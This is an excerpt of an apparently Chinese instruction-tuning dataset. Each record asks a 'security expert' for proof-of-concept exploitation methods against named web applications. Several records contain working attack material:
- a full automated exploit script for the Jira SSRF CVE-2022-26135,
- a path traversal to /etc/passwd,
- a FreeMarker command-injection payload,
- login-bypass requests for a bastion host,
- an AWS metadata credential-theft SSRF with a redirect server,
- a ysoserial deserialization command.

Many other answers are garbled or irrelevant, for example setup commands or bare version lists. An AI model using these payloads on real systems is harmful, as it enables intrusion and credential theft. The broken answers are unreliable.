  624. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Alibaba Nacos 未授权访问漏洞\n漏洞描述:2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。\n影响版本:``` Nacos <= 2.0.0-ALPHA.1 ```\n网络测绘:``` title=\"Nacos\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Nacos <= 2.0.0-ALPHA.1\n2. title=\"Nacos\"\n3. wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1\ntar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz\n./startup.sh -m standalone\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Alibaba Nacos 未授权访问漏洞.md"}
    625. 

  625. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:pgAdmin ≤ 6.16 无授权远程命令执行漏洞 CVE-2022-4223\n漏洞描述:pgAdmin 是一个著名的 PostgreSQL 数据库管理平台。 pgAdmin 包含一个 HTTP API 可以用来让用户选择并验证额外的 PostgreSQL 套件,比如 pg_dump 和 pg_restore。但在其 6.16 版本及以前,对于用户传入的路径没有做合适的验证,导致未授权的用户可以在目标服务器上执行任意命令。 参考链接: - https://github.com/pgadmin-org/pgadmin4/commit/799b6d8f7c10e920c9e67c2c18d381d6320ca604 - https://github.com/pgadmin-org/pgadmin4/commit/461849c2763e680ed2296bb8a753ca7aef546595 - https://github.com/advisories/GHSA-3v6v-2x6p-32mc\n影响版本:``` pgAdmin 版本 <= 6.16 ```\n网络测绘:``` \"pgadmin\" && icon_hash=\"1502815117\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-4223\n【POC利用方法】\n1. pgAdmin 版本 <= 6.16\n2. \"pgadmin\" && icon_hash=\"1502815117\"\n3. docker compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/pgAdmin ≤ 6.16 无授权远程命令执行漏洞 CVE-2022-4223.md"}
    626. 

  626. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ShowDoc 前台任意文件上传 CNVD-2020-26585\n漏洞描述:Showdoc 是一个开源的在线共享文档工具。 Showdoc <= 2.8.6 存在 uploadImg 文件上传漏洞,该漏洞源于未正确使用 upload 方法至文件后缀限制失效,攻击者可在未授权的情况下上传任意文件,进而获取服务器权限等。 参考链接: - https://github.com/star7th/showdoc/pull/1059 - https://github.com/star7th/showdoc/commit/fb77dd4db88dc23f5e570fc95919ee882aca520a - https://github.com/star7th/showdoc/commit/e1cd02a3f98bb227c0599e7fa6b803ab1097597f\n影响版本:``` Showdoc <= 2.8.6 ```\n网络测绘:``` app=\"ShowDoc\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Showdoc <= 2.8.6\n2. app=\"ShowDoc\"\n3. docker compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/ShowDoc 前台任意文件上传 CNVD-2020-26585.md"}
    627. 

  627. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:LiveBOS ShowImage.do 任意文件读取漏洞\n漏洞描述:LiveBOS ShowImage.do 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件\n影响版本:LiveBOS\n网络测绘:``` app=\"LiveBOS-框架\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"LiveBOS-框架\"\n2. /feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/LiveBOS ShowImage.do 任意文件读取漏洞.md"}
    628. 

  628. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Jira Mobile Plugin SSRF漏洞 CVE-2022-26135\n漏洞描述:6月29日,Atlassian官方发布安全公告,在Atlassian Jira 多款产品中存在服务端请求伪造漏洞(SSRF),经过身份验证的远程攻击者可通过向Jira Core REST API发送特制请求,从而伪造服务端发起请求,从而导致敏感信息泄露,同时为下一步攻击利用提供条件。需注意的是,若服务端开启注册功能,则未授权用户可通过注册获取权限进而利用。\n影响版本:``` Jira Core Server, Jira Software Server, and Jira Software Data Center: Versions after 8.0 and before 8.13.22 8.14.x 8.15.x 8.16.x 8.17.x 8.18.x 8.19.x 8.20.x before 8.20.10 8.21.x 8.22.x before 8.22.4 Jira Service Management Server and Data Center: Versions after 4.0 and before 4.13.22 4.14.x 4.15.x 4.16.x 4.17.x 4.18.x 4.19.x 4.20.x before 4.20.10 4.21.x 4.22.x before 4.22.4 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-26135\n【POC利用方法】\n1. Jira Core Server, Jira Software Server, and Jira Software Data Center:\nVersions after 8.0 and before 8.13.22\n8.14.x\n8.15.x\n8.16.x\n8.17.x\n8.18.x\n8.19.x\n8.20.x before 8.20.10\n8.21.x\n8.22.x before 8.22.4\n\nJira Service Management Server and Data Center:\nVersions after 4.0 and before 4.13.22\n4.14.x\n4.15.x\n4.16.x\n4.17.x\n4.18.x\n4.19.x\n4.20.x before 4.20.10\n4.21.x\n4.22.x before 4.22.4\n2. POST /rest/nativemobile/1.0/batch HTTP/2\nHost: issues.example.com\nCookie: JSESSIONID=44C6A24A15A1128CE78586A0FA1B1662; seraph.rememberme.cookie=818752%3Acc12c66e2f048b9d50eff8548800262587b3e9b1; atlassian.xsrf.token=AES2-GIY1-7JLS-HNZJ_db57d0893ec4d2e2f81c51c1a8984bde993b7445_lin\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nOrigin: https://issues.example.com\nReferer: https://issues.example.com/plugins/servlet/desk\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nContent-Length: 63\n\n{\"requests\":[{\"method\":\"GET\",\"location\":\"dnslog@example.com\"}]}\n3. import requests\nimport string\nimport random\nimport argparse\nfrom bs4 import BeautifulSoup as bs4\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--target\", help=\"i.e. http://re.local:8090\", required=True)\nparser.add_argument(\"--ssrf\", help=\"i.e. example.com (no protocol pls)\", required=True)\nparser.add_argument(\"--mode\", help=\"i.e. manual or automatic - manual mode you need to provide user auth info\", required=True, default=\"automatic\")\nparser.add_argument(\"--software\", help=\"i.e. jira or jsd - only needed for manual mode\")\nparser.add_argument(\"--username\", help=\"i.e. admin - only needed for manual jira mode\")\nparser.add_argument(\"--email\", help=\"i.e. admin@example.com - only needed for manual jira service desk mode\")\nparser.add_argument(\"--password\", help=\"i.e. testing123 - only needed for manual mode\")\nargs = parser.parse_args()\n\nif args.mode == \"manual\":\n    if args.software == \"\":\n        print(\"[*] please pass in a software (jira / jsd)\")\n    if args.software == \"jira\" and args.email == \"\" and args.password == \"\":\n        print(\"[*] must provide an email and password for jira in manual mode\")\n    if args.software == \"jsd\" and args.username == \"\" and args.password == \"\":\n        print(\"[*] must provide an username and password for jira in manual mode\")\n\n# atlast - exploit tested on jira < 8.20.3 / jira service desk < 4.20.3-REL-0018\n# for full list of affected jira versions please see the following URL\n# https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html\n# by shubs\nbanner = \"\"\"\n        _   _           _   \n   __ _| |_| | __ _ ___| |_ \n  / _` | __| |/ _` / __| __|\n | (_| | |_| | (_| \\__ \\ |_ \n  \\__,_|\\__|_|\\__,_|___/\\__|\n\njira full read ssrf [CVE-2022-26135]\nbrought to you by assetnote [https://assetnote.io]                            \n\"\"\"\n\nprint(banner)\n\nproxies = {} # proxy to burp like this - {\"https\":\"http://localhost:8080\"}\nsession = requests.Session()\n\ndef detect_jira_root(target):\n    root_paths = [\"/\", \"/secure/\" \"/jira/\", \"/issues/\"]\n    jira_found = \"\"\n    for path in root_paths:\n        test_url = \"{}/{}\".format(target, path)\n        r = session.get(test_url, verify=False, proxies=proxies)\n        if \"ajs-base-url\" in r.text:\n            jira_found = path\n            break\n    return jira_found\n\ndef get_jira_signup(target, base_path):\n    test_url = \"{}{}\".format(target, base_path)\n    r = session.get(test_url, verify=False, proxies=proxies)\n    signup_enabled = False\n    if \"Signup!default.jspa\" in r.text:\n        signup_enabled = True\n    return signup_enabled\n\ndef signup_user(target, base_path):\n    test_url = \"{}{}secure/Signup!default.jspa\".format(target, base_path)\n    test_url_post = \"{}{}secure/Signup.jspa\".format(target, base_path)\n    r = session.get(test_url, verify=False, proxies=proxies)\n    if 'name=\"captcha\"' in r.text:\n        print(\"[*] url {} has captchas enabled, please complete flow manually and provide user and password as arg\".format(test_url))\n        return False, {}\n    if \"Mode Breach\" in r.text:\n        print(\"[*] url {} has signups disabled, trying JSD approach\".format(test_url))\n        return False, {}\n    # captcha not detected, proceed with registration\n    html_bytes = r.text\n    soup = bs4(html_bytes, 'lxml')\n    token = soup.find('input', {'name':'atl_token'})['value']\n    full_name = ''.join(random.sample((string.ascii_uppercase+string.digits),6))\n    email = \"{}@example.com\".format(full_name)\n    password = \"9QWP7zyvfa4nJU9QKu*Yt8_QzbP\"\n    paramsPost = {\"password\":password,\"Signup\":\"Sign up\",\"atl_token\":token,\"fullname\":full_name,\"email\":email,\"username\":full_name}\n    headers = {\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\",\"Connection\":\"close\",\"Pragma\":\"no-cache\",\"DNT\":\"1\",\"Accept-Encoding\":\"gzip, deflate\",\"Cache-Control\":\"no-cache\",\"Upgrade-Insecure-Requests\":\"1\",\"Accept-Language\":\"en-US,en;q=0.9\",\"Content-Type\":\"application/x-www-form-urlencoded\"}\n    cookies = {\"atlassian.xsrf.token\":token}\n    r = session.post(test_url_post, data=paramsPost, headers=headers, cookies=cookies, verify=False, proxies=proxies)\n    if \"Congratulations!\" in r.text:\n        print(\"[*] successful registration\")\n        user_obj = {\"username\": full_name, \"password\": password, \"email\": email}\n        return True, user_obj\n\n# attempts to signup to root JSD\ndef register_jsd(target, base_path):\n    register_url = \"{}{}servicedesk/customer/user/signup\".format(target, base_path)\n    full_name = ''.join(random.sample((string.ascii_uppercase+string.digits),6))\n    email = \"{}@example.com\".format(full_name)\n    password = \"9QWP7zyvfa4nJU9QKu*Yt8_QzbP\"\n\n    # try and sign up to the service desk portal without project IDs (easy win?)\n    rawBody = \"{{\\\"email\\\":\\\"{}\\\",\\\"fullname\\\":\\\"{}\\\",\\\"password\\\":\\\"{}\\\",\\\"captcha\\\":\\\"\\\",\\\"secondaryEmail\\\":\\\"\\\"}}\".format(email, full_name, password)\n    headers = {\"Origin\":\"{}\".format(target),\"Accept\":\"*/*\",\"X-Requested-With\":\"XMLHttpRequest\",\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\",\"Referer\":\"{}/servicedesk/customer/portal/1/user/signup\".format(target),\"Connection\":\"close\",\"Pragma\":\"no-cache\",\"DNT\":\"1\",\"Accept-Encoding\":\"gzip, deflate\",\"Cache-Control\":\"no-cache\",\"Accept-Language\":\"en-US,en;q=0.9\",\"Content-Type\":\"application/json\"}\n    r = session.post(register_url, data=rawBody, headers=headers, verify=False, proxies=proxies)\n    if r.status_code == 204:\n        print(\"[*] successful registration\")\n        user_obj = {\"username\": full_name, \"password\": password, \"email\": email}\n        return True, user_obj\n    print(\"[*] url {} has non-captcha user/pass signups disabled :(\".format(register_url))\n    register_email_url = \"{}{}servicedesk/customer/user/emailsignup\".format(target, base_path)\n    rawBody = \"{{\\\"email\\\":\\\"{}\\\",\\\"captcha\\\":\\\"\\\",\\\"secondaryEmail\\\":\\\"\\\"}}\".format(email)\n    r = session.post(register_email_url, data=rawBody, headers=headers, verify=False, proxies=proxies)\n    if r.status_code == 204:\n        print(\"[*] registration may be possible via emailsignup endpoint\")\n        print(\"[*] you will have to manually exploit this with a real email\")\n        print(\"[*] visit {}\".format(register_url))\n        return False, {}\n    if r.status_code == 400:\n        print(\"[*] registration may be possible via emailsignup endpoint\")\n        print(\"[*] you will have to manually exploit this with a real email and captcha\")\n        print(\"[*] visit {}\".format(register_url))\n        return False, {}\n    print(r.status_code)\n    return False, {}\n\ndef exploit_ssrf_jsd(target, base_path, user_obj, ssrf_host):\n    login_url = \"{}{}servicedesk/customer/user/login\".format(target, base_path)\n    paramsPost = {\"os_password\":user_obj[\"password\"],\"os_username\":user_obj[\"email\"]}\n    headers = {\"Origin\":\"{}\".format(target),\"Accept\":\"*/*\",\"X-Requested-With\":\"XMLHttpRequest\",\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\",\"Referer\":\"{}/servicedesk/customer/portal/1/user/signup\".format(target),\"Connection\":\"close\",\"Pragma\":\"no-cache\",\"DNT\":\"1\",\"Accept-Encoding\":\"gzip, deflate\",\"Cache-Control\":\"no-cache\",\"Accept-Language\":\"en-US,en;q=0.9\",\"Content-Type\":\"application/x-www-form-urlencoded\"}\n    r = session.post(login_url, data=paramsPost, headers=headers, verify=False, proxies=proxies)\n\n    if \"loginSucceeded\" in r.text:\n        print(\"[*] successful login\")\n\n    test_url = \"{}{}rest/nativemobile/1.0/batch\".format(target, base_path)\n    rawBody = \"{{\\\"requests\\\":[{{\\\"method\\\":\\\"GET\\\",\\\"location\\\":\\\"@{}\\\"}}]}}\".format(ssrf_host)\n    headers = {\"Origin\":\"{}\".format(target),\"Accept\":\"*/*\",\"X-Requested-With\":\"XMLHttpRequest\",\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\",\"Referer\":\"{}/servicedesk/customer/portal/1/user/signup\".format(target),\"Connection\":\"close\",\"Pragma\":\"no-cache\",\"DNT\":\"1\",\"Accept-Encoding\":\"gzip, deflate\",\"Cache-Control\":\"no-cache\",\"Accept-Language\":\"en-US,en;q=0.9\",\"Content-Type\":\"application/json\"}\n    r = session.post(test_url, data=rawBody, headers=headers)\n\n    print(\"Status code:   %i\" % r.status_code)\n    print(\"Response body: %s\" % r.content)\n\ndef exploit_ssrf_jira(target, base_path, user_obj, ssrf_host):\n    login_url = \"{}{}login.jsp\".format(target, base_path)\n    paramsPost = {\"os_password\":user_obj[\"password\"],\"user_role\":\"\",\"os_username\":user_obj[\"username\"],\"atl_token\":\"\",\"os_destination\":\"\",\"login\":\"Log In\"}\n    headers = {\"Origin\":\"{}\".format(target),\"Accept\":\"*/*\",\"X-Requested-With\":\"XMLHttpRequest\",\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\",\"Referer\":\"{}/\".format(target),\"Connection\":\"close\",\"Pragma\":\"no-cache\",\"DNT\":\"1\",\"Accept-Encoding\":\"gzip, deflate\",\"Cache-Control\":\"no-cache\",\"Upgrade-Insecure-Requests\":\"1\",\"Accept-Language\":\"en-US,en;q=0.9\",\"Content-Type\":\"application/x-www-form-urlencoded\"}\n    r = session.post(login_url, data=paramsPost, headers=headers, verify=False, proxies=proxies)\n    \n    if r.headers[\"X-Seraph-LoginReason\"] == \"OK\":\n        print(\"[*] successful login\")\n\n    test_url = \"{}{}rest/nativemobile/1.0/batch\".format(target, base_path)\n    rawBody = \"{{\\\"requests\\\":[{{\\\"method\\\":\\\"GET\\\",\\\"location\\\":\\\"@{}\\\"}}]}}\".format(ssrf_host)\n    headers = {\"Origin\":\"{}\".format(target),\"Accept\":\"*/*\",\"X-Requested-With\":\"XMLHttpRequest\",\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\",\"Referer\":\"{}/servicedesk/customer/portal/1/user/signup\".format(target),\"Connection\":\"close\",\"Pragma\":\"no-cache\",\"DNT\":\"1\",\"Accept-Encoding\":\"gzip, deflate\",\"Cache-Control\":\"no-cache\",\"Accept-Language\":\"en-US,en;q=0.9\",\"Content-Type\":\"application/json\"}\n    r = session.post(test_url, data=rawBody, headers=headers)\n\n    print(\"Status code:   %i\" % r.status_code)\n    print(\"Response body: %s\" % r.content)\n\n\n# target = \"http://re.local:8090\"\n# ssrf_host = \"907zer1sxey5czbnnf7p9d1zfqlj98.oastify.com\"\n\nuser_obj = {}\n\nsuccessful_jira_signup = False\nsuccessful_jsd_signup = False\n\njira_root = detect_jira_root(args.target)\n\nif args.mode == \"manual\" and args.software == \"jira\":\n    user_obj = {\"username\": args.username, \"password\": args.password, \"email\": args.email}\n    exploit_ssrf_jira(args.target, jira_root, user_obj, args.ssrf)\n\nif args.mode == \"manual\" and args.software == \"jsd\":\n    user_obj = {\"username\": args.username, \"password\": args.password, \"email\": args.email}\n    exploit_ssrf_jsd(args.target, jira_root, user_obj, args.ssrf)\n\nif args.mode == \"automatic\":\n    signup_enabled = get_jira_signup(args.target, jira_root)\n    successful_jira_signup, user_obj = signup_user(args.target, jira_root)\n\n    if successful_jira_signup == True:\n        exploit_ssrf_jira(args.target, jira_root, user_obj, args.ssrf)\n\n    if successful_jira_signup == False:\n        # try to sign up to jira service desk instead\n        successful_jsd_signup, user_obj = register_jsd(args.target, jira_root)\n        if successful_jsd_signup:\n            exploit_ssrf_jsd(args.target, jira_root, user_obj, args.ssrf)\n\nif successful_jira_signup == False and successful_jsd_signup == False:\n    print(\"[*] sorry boss no ssrf for you today\")\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Jira Mobile Plugin SSRF漏洞 CVE-2022-26135.md"}
    629. 

  629. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:LimeSurvey LimeSurveyFileManager.php 后台任意文件读取漏洞 CVE-2020-11455\n漏洞描述:LimeSurvey(前称PHPSurveyor)是LimeSurvey团队的一套开源的在线问卷调查程序,它支持调查程序开发、调查问卷发布以及数据收集等功能。 LimeSurvey 4.1.12 + 200324之前版本中的application/controllers/admin/LimeSurveyFileManager.php文件存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。\n影响版本:``` LimeSurvey < 4.1.12 + 200324 ```\n网络测绘:``` app=\"LimeSurvey\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-11455\n【POC利用方法】\n1. LimeSurvey < 4.1.12 + 200324\n2. app=\"LimeSurvey\"\n3. public function downloadFiles() {\n        App()->loadLibrary('admin.pclzip');\n        \n        $folder = basename(Yii::app()->request->getPost('folder', 'global'));\n        $files = Yii::app()->request->getPost('files');\n\n        $tempdir = Yii::app()->getConfig('tempdir');\n        $randomizedFileName = $folder.'_'.substr(md5(time()),3,13).'.zip';\n        $zipfile = $tempdir.DIRECTORY_SEPARATOR.$randomizedFileName;\n        $arrayOfFiles = array_map( function($file){ return $file['path']; }, $files);\n        $archive = new PclZip($zipfile);\n        $checkFileCreate = $archive->create($arrayOfFiles, PCLZIP_OPT_REMOVE_ALL_PATH);\n        $urlFormat = Yii::app()->getUrlManager()->getUrlFormat();\n        $getFileLink = Yii::app()->createUrl('admin/filemanager/sa/getZipFile');\n        if($urlFormat == 'path') {\n            $getFileLink .= '?path='.$zipfile;\n        } else {\n            $getFileLink .= '&path='.$zipfile;\n        }\n\n        $this->_printJsonResponse(\n            [\n                'success' => true,\n                'message' => sprintf(gT(\"Files are ready for download in archive %s.\"), $randomizedFileName),\n                'downloadLink' => $getFileLink ,\n            ]\n        );\n    }\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/LimeSurvey LimeSurveyFileManager.php 后台任意文件读取漏洞 CVE-2020-11455.md"}
    630. 

  630. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PowerJob list 信息泄漏漏洞 CVE-2023-29923\n漏洞描述:PowerJob list接口存在信息泄漏漏洞,攻击者无需通过授权就可以访问授权的接口,获取敏感数据。\n影响版本:``` PowerJob ```\n网络测绘:``` app=\"PowerJob\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-29923\n【POC利用方法】\n1. app=\"PowerJob\"\n2. POST /job/list\nContent-Type: application/json\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n3. POST /job/list\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/PowerJob list 信息泄漏漏洞 CVE-2023-29923.md"}
    631. 

  631. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:思福迪堡垒机 任意用户登录漏洞\n漏洞描述:思福迪堡垒机存在任意⽤户登录漏洞,恶意攻击者可以绕过堡垒机的密码登录验证机制,以任 意⽤户身份随意登录堡垒机Web管理界⾯,并可以正常的使⽤账户权限去操作。\n影响版本:``` 思福迪堡垒机 ```\n网络测绘:``` \"Logbase运维安全管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"Logbase运维安全管理系统\"\n2. POST /bhost/set_session HTTP/1.1\nHost: xxx.xxx.xxx.xx\nu1=admin&m1=\n3. POST /bhost/login_link HTTP/1.1\nHost: xxx.xxx.xxx.xxx\na0=1562205376847&a1=&a10=2019-01-\n01+10:10:10&ha=CADFDF26E649FB6284D2FD424BD294B6&uCode=admin&vdcode=\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/思福迪堡垒机 任意用户登录漏洞.md"}
    632. 

  632. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:新开普 前置服务管理平台 service.action 远程命令执行漏洞\n漏洞描述:新开普 前置服务管理平台 service.action 接口存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限\n影响版本:新开普 前置服务管理平台\n网络测绘:``` title=\"掌上校园服务管理平台\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"掌上校园服务管理平台\"\n2. POST /service_transport/service.action HTTP/1.1\nHost: \nAccept: */*\nContent-Type: application/json\n\n{\"command\":\"GetFZinfo\",\"UnitCode\":\"<#assign ex = \\\"freemarker.template.utility.Execute\\\"?new()>${ex(\\\"cmd /c echo Test > ./webapps/ROOT/Test.txt\\\")}\"}\n3. Accept: */*\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/新开普 前置服务管理平台 service.action 远程命令执行漏洞.md"}
    633. 

  633. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Appspace jsonprequest SSRF漏洞 CVE-2021-27670\n漏洞描述:Appspace 6.2.4存在漏洞,允许通过api/v1/core/proxy/jsonprequest接口来进行服务端请求伪造,危害系统安全。\n影响版本:``` Appspace 6.2.4 ```\n网络测绘:``` \"Sign-in-to-Appspace-Core\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-27670\n【POC利用方法】\n1. Appspace 6.2.4\n2. \"Sign-in-to-Appspace-Core\"\n3. /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://db0bx.2lfmar.yourdomain.xyz\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Appspace jsonprequest SSRF漏洞 CVE-2021-27670.md"}
    634. 

  634. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 畅捷通 T+ 前台远程命令执行漏洞 QVD-2023-13615\n漏洞描述:由于用友畅捷通 T+前台存在反序列化漏洞,恶意攻击者成功利用此漏洞可在目标服务器上执行任意命令。\n影响版本:``` T+13.0 T+16.0 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. T+13.0\nT+16.0\n2. POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1\nHost: your-ip\nX-Ajaxpro-Method: GetStoreWarehouseByStore\n \n{\n  \"storeID\":{}\n}\n3. ./ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -c \"执行的命令\"\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/用友 畅捷通 T+ 前台远程命令执行漏洞 QVD-2023-13615.md"}
    635. 

  635. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Adminer SSRF漏洞 CVE-2021-21311\n漏洞描述:使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。 参考链接: - https://github.com/advisories/GHSA-x5r2-hj5c-8jx6 - https://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-21311\n【POC利用方法】\n1. http://169.254.169.254/latest/meta-data/instance-id\n2. #!/usr/bin/env python\n\nimport SimpleHTTPServer\nimport SocketServer\nimport sys\nimport argparse\n\ndef redirect_handler_factory(url):\n    \"\"\"\n    Returns a request handler class that redirects to supplied `url`\n    \"\"\"\n    class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n       def do_GET(self):\n           self.send_response(301)\n           self.send_header('Location', url)\n           self.end_headers()\n\n       def do_POST(self):\n           self.send_response(301)\n           self.send_header('Location', url)\n           self.end_headers()\n\n    return RedirectHandler\n\n\ndef main():\n\n    parser = argparse.ArgumentParser(description='HTTP redirect server')\n\n    parser.add_argument('--port', '-p', action=\"store\", type=int, default=80, help='port to listen on')\n    parser.add_argument('--ip', '-i', action=\"store\", default=\"\", help='host interface to listen on')\n    parser.add_argument('redirect_url', action=\"store\")\n\n    myargs = parser.parse_args()\n\n    redirect_url = myargs.redirect_url\n    port = myargs.port\n    host = myargs.ip\n\n    redirectHandler = redirect_handler_factory(redirect_url)\n\n    handler = SocketServer.TCPServer((host, port), redirectHandler)\n    print(\"serving at port %s\" % port)\n    handler.serve_forever()\n\nif __name__ == \"__main__\":\n    main()\n3. http://169.254.169.254/latest/meta-data/iam/security-credentials/  //列出服务器的可用角色。\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Adminer-SSRF漏洞 CVE-2021-21311.md"}
    636. 

  636. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞\n漏洞描述:深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问,导致账号密码泄漏\n影响版本:``` 深信服 应用交付管理系统 ```\n网络测绘:``` app=\"SANGFOR-应用交付管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 深信服 应用交付管理系统\n2. app=\"SANGFOR-应用交付管理系统\"\n3. /tmp/updateme/sinfor/ad/sys/sys_user.conf\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞.md"}
    637. 

  637. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TerraMaster TOS createRaid 远程命令执行漏洞 CVE-2022-24989\n漏洞描述:TerraMaster TOS mobile.class.php文件的createRaid方法存在远程命令执行漏洞 ,攻击者配合 CVE-2022-24990漏洞可以获取服务器权限\n影响版本:``` TerraMaster TOS < 4.2.31 ```\n网络测绘:``` \"TerraMaster\" && header=\"TOS\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-24989\n【POC利用方法】\n1. TerraMaster TOS < 4.2.31\n2. \"TerraMaster\" && header=\"TOS\"\n3. $ret = $vol->volume_make_from_disks($this->in['raidtype'], $filesystem, $disks, $volume_size);\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/TerraMaster TOS createRaid 远程命令执行漏洞 CVE-2022-24989.md"}
    638. 

